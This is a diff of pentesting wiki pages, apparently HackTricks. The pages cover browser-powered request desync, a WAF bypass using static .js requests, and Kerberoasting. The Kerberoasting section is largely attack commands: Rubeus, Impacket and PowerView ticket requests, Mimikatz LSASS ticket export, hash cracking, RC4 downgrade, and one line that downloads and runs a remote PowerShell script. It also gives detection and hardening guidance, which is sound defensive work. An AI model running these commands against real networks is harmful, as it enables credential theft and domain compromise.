**Check the post [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)**
Browser-powered desync (aka client-side request smuggling) abuses the victims browser to enqueue a mis-framed request onto a shared connection so that subsequent requests are parsed out-of-sync by a downstream component. Unlike classic FE↔BE smuggling, payloads are constrained by what a browser can legally send cross-origin.
Key constraints and tips
- Only use headers and syntax that a browser can emit via navigation, fetch, or form submission. Header obfuscations (LWS tricks, duplicate TE, invalid CL) generally wont send.
- Target endpoints and intermediaries that reflect inputs or cache responses. Useful impacts include cache poisoning, leaking front-end injected headers, or bypassing front-end path/method controls.
- Reuse matters: align the crafted request so it shares the same HTTP/1.1 or H2 connection as a high-value victim request. Connection-locked/stateful behaviors amplify impact.
- Prefer primitives that do not require custom headers: path confusion, query-string injection, and body shaping via form-encoded POSTs.
- Validate genuine server-side desync vs. mere pipelining artifacts by re-testing without reuse, or by using the HTTP/2 nested-response check.
For end-to-end techniques and PoCs see:
- PortSwigger Research BrowserPowered Desync Attacks: https://portswigger.net/research/browser-powered-desync-attacks
- PortSwigger Academy clientside desync: https://portswigger.net/web-security/request-smuggling/browser/client-side-desync
## References
- [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)
- [https://portswigger.net/web-security/request-smuggling/browser/client-side-desync](https://portswigger.net/web-security/request-smuggling/browser/client-side-desync)
- Distinguishing pipelining vs smuggling (background on reuse false-positives): https://portswigger.net/research/how-to-distinguish-http-pipelining-from-request-smuggling
{{#include ../../banners/hacktricks-training.md}}

View File

@ -131,7 +131,24 @@ By default, the WAF inspects only the first 8KB of a request. It can increase th
Up to 128KB.
### Obfuscation <a href="#obfuscation" id="obfuscation"></a>
### Static assets inspection gaps (.js GETs)
Some CDN/WAF stacks apply weak or no content inspection to GET requests for static assets (for example paths ending with `.js`), while still applying global rules like rate limiting and IP reputation. Combined with auto-caching of static extensions, this can be abused to deliver or seed malicious variants that affect subsequent HTML responses.
Practical use cases:
- Send payloads in untrusted headers (e.g., `User-Agent`) on a GET to a `.js` path to avoid content inspection, then immediately request the main HTML to influence the cached variant.
- Use a fresh/clean IP; once an IP is flagged, routing changes can make the technique unreliable.
- In Burp Repeater, use "Send group in parallel" (single-packet style) to race the two requests (`.js` then HTML) through the same front-end path.
This pairs well with header-reflection cache poisoning. See:
- {{#ref}}
cache-deception/README.md
{{#endref}}
- [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/)
### Obfuscation <a href="#ip-rotation" id="ip-rotation"></a>
```bash
# IIS, ASP Clasic
@ -224,8 +241,8 @@ data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascri
- [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/)
- [https://www.youtube.com/watch?v=0OMmWtU2Y_g](https://www.youtube.com/watch?v=0OMmWtU2Y_g)
- [https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization)
- [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/)
{{#include ../banners/hacktricks-training.md}}

View File

@ -4,176 +4,239 @@
## Kerberoast
Kerberoasting focuses on the acquisition of **TGS tickets**, specifically those related to services operating under **user accounts** in **Active Directory (AD)**, excluding **computer accounts**. The encryption of these tickets utilizes keys that originate from **user passwords**, allowing for the possibility of **offline credential cracking**. The use of a user account as a service is indicated by a non-empty **"ServicePrincipalName"** property.
Kerberoasting focuses on the acquisition of TGS tickets, specifically those related to services operating under user accounts in Active Directory (AD), excluding computer accounts. The encryption of these tickets utilizes keys that originate from user passwords, allowing for offline credential cracking. The use of a user account as a service is indicated by a non-empty ServicePrincipalName (SPN) property.
For executing **Kerberoasting**, a domain account capable of requesting **TGS tickets** is essential; however, this process does not demand **special privileges**, making it accessible to anyone with **valid domain credentials**.
Any authenticated domain user can request TGS tickets, so no special privileges are needed.
### Key Points:
### Key Points
- **Kerberoasting** targets **TGS tickets** for **user-account services** within **AD**.
- Tickets encrypted with keys from **user passwords** can be **cracked offline**.
- A service is identified by a **ServicePrincipalName** that is not null.
- **No special privileges** are needed, just **valid domain credentials**.
### **Attack**
- Targets TGS tickets for services that run under user accounts (i.e., accounts with SPN set; not computer accounts).
- Tickets are encrypted with a key derived from the service accounts password and can be cracked offline.
- No elevated privileges required; any authenticated account can request TGS tickets.
> [!WARNING]
> **Kerberoasting tools** typically request **`RC4 encryption`** when performing the attack and initiating TGS-REQ requests. This is because **RC4 is** [**weaker**](https://www.stigviewer.com/stig/windows_10/2017-04-28/finding/V-63795) and easier to crack offline using tools such as Hashcat than other encryption algorithms such as AES-128 and AES-256.\
> RC4 (type 23) hashes begin with **`$krb5tgs$23$*`** while AES-256(type 18) start with **`$krb5tgs$18$*`**`.`
> Moreover, be careful because `Rubeus.exe kerberoast` request tickets automatically over ALL the vulnerable accounts which will get you detected. First, find kerberoastable users with interesting privileges and then run it nly over them.
> Most public tools prefer requesting RC4-HMAC (etype 23) service tickets because theyre faster to crack than AES. RC4 TGS hashes start with `$krb5tgs$23$*`, AES128 with `$krb5tgs$17$*`, and AES256 with `$krb5tgs$18$*`. However, many environments are moving to AES-only. Do not assume only RC4 is relevant.
> Also, avoid “spray-and-pray” roasting. Rubeus default kerberoast can query and request tickets for all SPNs and is noisy. Enumerate and target interesting principals first.
### Attack
#### Linux
```bash
#### **Linux**
```bash
# Metasploit framework
# Metasploit Framework
msf> use auxiliary/gather/get_user_spns
# Impacket
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # Password will be prompted
GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast
# kerberoast: https://github.com/skelsec/kerberoast
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -o kerberoastable # 1. Enumerate kerberoastable users
kerberoast spnroast 'kerberos+password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. Dump hashes
# Impacket — request and save roastable hashes (prompts for password)
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN>/<USER> -outputfile hashes.kerberoast
# With NT hash
GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USER> -outputfile hashes.kerberoast
# Target a specific users SPNs only (reduce noise)
GetUserSPNs.py -request-user <samAccountName> -dc-ip <DC_IP> <DOMAIN>/<USER>
# kerberoast by @skelsec (enumerate and roast)
# 1) Enumerate kerberoastable users via LDAP
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN>\\<USER>:<PASS>@<DC_IP>' -o kerberoastable
# 2) Request TGS for selected SPNs and dump
kerberoast spnroast 'kerberos+password://<DOMAIN>\\<USER>:<PASS>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes
```
Multi-features tools including a dump of kerberoastable users:
Multi-feature tools including kerberoast checks:
```bash
# ADenum: https://github.com/SecuProject/ADenum
adenum -d <DOMAIN.FULL> -ip <DC_IP> -u <USERNAME> -p <PASSWORD> -c
adenum -d <DOMAIN> -ip <DC_IP> -u <USER> -p <PASS> -c
```
#### Windows
- **Enumerate Kerberoastable users**
- Enumerate kerberoastable users
```bash
# Get Kerberoastable users
setspn.exe -Q */* #This is a built-in binary. Focus on user accounts
Get-NetUser -SPN | select serviceprincipalname #Powerview
```powershell
# Built-in
setspn.exe -Q */* # Focus on entries where the backing object is a user, not a computer ($)
# PowerView
Get-NetUser -SPN | Select-Object serviceprincipalname
# Rubeus stats (AES/RC4 coverage, pwd-last-set years, etc.)
.\Rubeus.exe kerberoast /stats
```
- **Technique 1: Ask for TGS and dump it from memory**
- Technique 1: Ask for TGS and dump from memory
```bash
#Get TGS in memory from a single user
```powershell
# Acquire a single service ticket in memory for a known SPN
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ServicePrincipalName" #Example: MSSQLSvc/mgmt.domain.local
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "<SPN>" # e.g. MSSQLSvc/mgmt.domain.local
#Get TGSs for ALL kerberoastable accounts (PCs included, not really smart)
setspn.exe -T DOMAIN_NAME.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
#List kerberos tickets in memory
# Get all cached Kerberos tickets
klist
# Extract them from memory
Invoke-Mimikatz -Command '"kerberos::list /export"' #Export tickets to current folder
# Export tickets from LSASS (requires admin)
Invoke-Mimikatz -Command '"kerberos::list /export"'
# Transform kirbi ticket to john
python2.7 kirbi2john.py sqldev.kirbi
# Transform john to hashcat
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
# Convert to cracking formats
python2.7 kirbi2john.py .\some_service.kirbi > tgs.john
# Optional: convert john -> hashcat etype23 if needed
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$*\1*$\2/' tgs.john > tgs.hashcat
```
- **Technique 2: Automatic tools**
- Technique 2: Automatic tools
```bash
# Powerview: Get Kerberoast hash of a user
Request-SPNTicket -SPN "<SPN>" -Format Hashcat #Using PowerView Ex: MSSQLSvc/mgmt.domain.local
# Powerview: Get all Kerberoast hashes
```powershell
# PowerView — single SPN to hashcat format
Request-SPNTicket -SPN "<SPN>" -Format Hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
# PowerView — all user SPNs -> CSV
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\kerberoast.csv -NoTypeInformation
# Rubeus
# Rubeus — default kerberoast (be careful, can be noisy)
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast #Specific user
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap #Get of admins
# Invoke-Kerberoast
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
# Rubeus — target a single account
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast
# Rubeus — target admins only
.\Rubeus.exe kerberoast /ldapfilter:'(admincount=1)' /nowrap
```
> [!WARNING]
> When a TGS is requested, Windows event `4769 - A Kerberos service ticket was requested` is generated.
> A TGS request generates Windows Security Event 4769 (A Kerberos service ticket was requested).
### OPSEC and AES-only environments
- Request RC4 on purpose for accounts without AES:
- Rubeus: `/rc4opsec` uses tgtdeleg to enumerate accounts without AES and requests RC4 service tickets.
- Rubeus: `/tgtdeleg` with kerberoast also triggers RC4 requests where possible.
- Roast AES-only accounts instead of failing silently:
- Rubeus: `/aes` enumerates accounts with AES enabled and requests AES service tickets (etype 17/18).
- If you already hold a TGT (PTT or from a .kirbi), you can use `/ticket:<blob|path>` with `/spn:<SPN>` or `/spns:<file>` and skip LDAP.
- Targeting, throttling and less noise:
- Use `/user:<sam>`, `/spn:<spn>`, `/resultlimit:<N>`, `/delay:<ms>` and `/jitter:<1-100>`.
- Filter for likely weak passwords using `/pwdsetbefore:<MM-dd-yyyy>` (older passwords) or target privileged OUs with `/ou:<DN>`.
Examples (Rubeus):
```powershell
# Kerberoast only AES-enabled accounts
.\Rubeus.exe kerberoast /aes /outfile:hashes.aes
# Request RC4 for accounts without AES (downgrade via tgtdeleg)
.\Rubeus.exe kerberoast /rc4opsec /outfile:hashes.rc4
# Roast a specific SPN with an existing TGT from a non-domain-joined host
.\Rubeus.exe kerberoast /ticket:C:\\temp\\tgt.kirbi /spn:MSSQLSvc/sql01.domain.local
```
### Cracking
```bash
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
# John the Ripper
john --format=krb5tgs --wordlist=wordlist.txt hashes.kerberoast
# Hashcat
# RC4-HMAC (etype 23)
hashcat -m 13100 -a 0 hashes.rc4 wordlist.txt
# AES128-CTS-HMAC-SHA1-96 (etype 17)
hashcat -m 19600 -a 0 hashes.aes128 wordlist.txt
# AES256-CTS-HMAC-SHA1-96 (etype 18)
hashcat -m 19700 -a 0 hashes.aes256 wordlist.txt
```
### Persistence
### Persistence / Abuse
If you have **enough permissions** over a user you can **make it kerberoastable**:
If you control or can modify an account, you can make it kerberoastable by adding an SPN:
```bash
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose
```powershell
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='fake/WhateverUn1Que'} -Verbose
```
You can find useful **tools** for **kerberoast** attacks here: [https://github.com/nidem/kerberoast](https://github.com/nidem/kerberoast)
Downgrade an account to enable RC4 for easier cracking (requires write privileges on the target object):
If you find this **error** from Linux: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`** it because of your local time, you need to synchronise the host with the DC. There are a few options:
- `ntpdate <IP of DC>` - Deprecated as of Ubuntu 16.04
- `rdate -n <IP of DC>`
### Mitigation
Kerberoasting can be conducted with a high degree of stealthiness if it is exploitable. In order to detect this activity, attention should be paid to **Security Event ID 4769**, which indicates that a Kerberos ticket has been requested. However, due to the high frequency of this event, specific filters must be applied to isolate suspicious activities:
- The service name should not be **krbtgt**, as this is a normal request.
- Service names ending with **$** should be excluded to avoid including machine accounts used for services.
- Requests from machines should be filtered out by excluding account names formatted as **machine@domain**.
- Only successful ticket requests should be considered, identified by a failure code of **'0x0'**.
- **Most importantly**, the ticket encryption type should be **0x17**, which is often used in Kerberoasting attacks.
```bash
Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split("`n")[8] -ne 'krbtgt' -and $_.Message.split("`n")[8] -ne '*$' -and $_.Message.split("`n")[3] -notlike '*$@*' -and $_.Message.split("`n")[18] -like '*0x0*' -and $_.Message.split("`n")[17] -like "*0x17*"} | select ExpandProperty message
```powershell
# Allow only RC4 (value 4) — very noisy/risky from a blue-team perspective
Set-ADUser -Identity <username> -Replace @{msDS-SupportedEncryptionTypes=4}
# Mixed RC4+AES (value 28)
Set-ADUser -Identity <username> -Replace @{msDS-SupportedEncryptionTypes=28}
```
To mitigate the risk of Kerberoasting:
You can find useful tools for kerberoast attacks here: https://github.com/nidem/kerberoast
- Ensure that **Service Account Passwords are difficult to guess**, recommending a length of more than **25 characters**.
- Utilize **Managed Service Accounts**, which offer benefits like **automatic password changes** and **delegated Service Principal Name (SPN) Management**, enhancing security against such attacks.
If you find this error from Linux: `Kerberos SessionError: KRB_AP_ERR_SKEW (Clock skew too great)` its due to local time skew. Sync to the DC:
By implementing these measures, organizations can significantly reduce the risk associated with Kerberoasting.
- `ntpdate <DC_IP>` (deprecated on some distros)
- `rdate -n <DC_IP>`
## Kerberoast w/o domain account
### Detection
In **September 2022**, a new way to exploit a system was brought to light by a researcher named Charlie Clark, shared through his platform [exploit.ph](https://exploit.ph/). This method allows for the acquisition of **Service Tickets (ST)** via a **KRB_AS_REQ** request, which remarkably does not necessitate control over any Active Directory account. Essentially, if a principal is set up in such a way that it doesn't require pre-authentication—a scenario similar to what's known in the cybersecurity realm as an **AS-REP Roasting attack**—this characteristic can be leveraged to manipulate the request process. Specifically, by altering the **sname** attribute within the request's body, the system is deceived into issuing a **ST** rather than the standard encrypted Ticket Granting Ticket (TGT).
Kerberoasting can be stealthy. Hunt for Event ID 4769 from DCs and apply filters to reduce noise:
The technique is fully explained in this article: [Semperis blog post](https://www.semperis.com/blog/new-attack-paths-as-requested-sts/).
- Exclude service name `krbtgt` and service names ending with `$` (computer accounts).
- Exclude requests from machine accounts (`*$$@*`).
- Only successful requests (Failure Code `0x0`).
- Track encryption types: RC4 (`0x17`), AES128 (`0x11`), AES256 (`0x12`). Dont alert only on `0x17`.
Example PowerShell triage:
```powershell
Get-WinEvent -FilterHashtable @{Logname='Security'; ID=4769} -MaxEvents 1000 |
Where-Object {
($_.Message -notmatch 'krbtgt') -and
($_.Message -notmatch '\$$') -and
($_.Message -match 'Failure Code:\s+0x0') -and
($_.Message -match 'Ticket Encryption Type:\s+(0x17|0x12|0x11)') -and
($_.Message -notmatch '\$@')
} |
Select-Object -ExpandProperty Message
```
Additional ideas:
- Baseline normal SPN usage per host/user; alert on large bursts of distinct SPN requests from a single principal.
- Flag unusual RC4 usage in AES-hardened domains.
### Mitigation / Hardening
- Use gMSA/dMSA or machine accounts for services. Managed accounts have 120+ character random passwords and rotate automatically, making offline cracking impractical.
- Enforce AES on service accounts by setting `msDS-SupportedEncryptionTypes` to AES-only (decimal 24 / hex 0x18) and then rotating the password so AES keys are derived.
- Where possible, disable RC4 in your environment and monitor for attempted RC4 usage. On DCs you can use the `DefaultDomainSupportedEncTypes` registry value to steer defaults for accounts without `msDS-SupportedEncryptionTypes` set. Test thoroughly.
- Remove unnecessary SPNs from user accounts.
- Use long, random service account passwords (25+ chars) if managed accounts are not feasible; ban common passwords and audit regularly.
### Kerberoast without a domain account (AS-requested STs)
In September 2022, Charlie Clark showed that if a principal does not require pre-authentication, its possible to obtain a service ticket via a crafted KRB_AS_REQ by altering the sname in the request body, effectively getting a service ticket instead of a TGT. This mirrors AS-REP roasting and does not require valid domain credentials.
See details: Semperis write-up “New Attack Paths: AS-requested STs”.
> [!WARNING]
> You must provide a list of users because we don't have a valid account to query the LDAP using this technique.
> You must provide a list of users because without valid credentials you cannot query LDAP with this technique.
#### Linux
Linux
- [impacket/GetUserSPNs.py from PR #1413](https://github.com/fortra/impacket/pull/1413):
- Impacket (PR #1413):
```bash
GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile "LIST_USERS" -dc-host "dc.domain.local" "domain.local"/
GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile users.txt -dc-host dc.domain.local domain.local/
```
#### Windows
Windows
- [GhostPack/Rubeus from PR #139](https://github.com/GhostPack/Rubeus/pull/139):
- Rubeus (PR #139):
```bash
Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"domain.local" /dc:"dc.domain.local" /nopreauth:"NO_PREAUTH_USER" /spn:"TARGET_SERVICE"
```powershell
Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:domain.local /dc:dc.domain.local /nopreauth:NO_PREAUTH_USER /spn:TARGET_SERVICE
```
Related
If you are targeting AS-REP roastable users, see also:
{{#ref}}
asreproast.md
{{#endref}}
## References
- [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled)
- Microsoft Security Blog (2024-10-11) Microsofts guidance to help mitigate Kerberoasting: https://www.microsoft.com/en-us/security/blog/2024/10/11/microsofts-guidance-to-help-mitigate-kerberoasting/
- SpecterOps Rubeus Roasting documentation: https://docs.specterops.io/ghostpack/rubeus/roasting
{{#include ../../banners/hacktricks-training.md}}

View File

@ -151,14 +151,14 @@ Hunting ideas
{{#ref}}
wmiexec.md
./wmiexec.md
{{#endref}}
- WinRM-based remote exec:
{{#ref}}
winrm.md
./winrm.md
{{#endref}}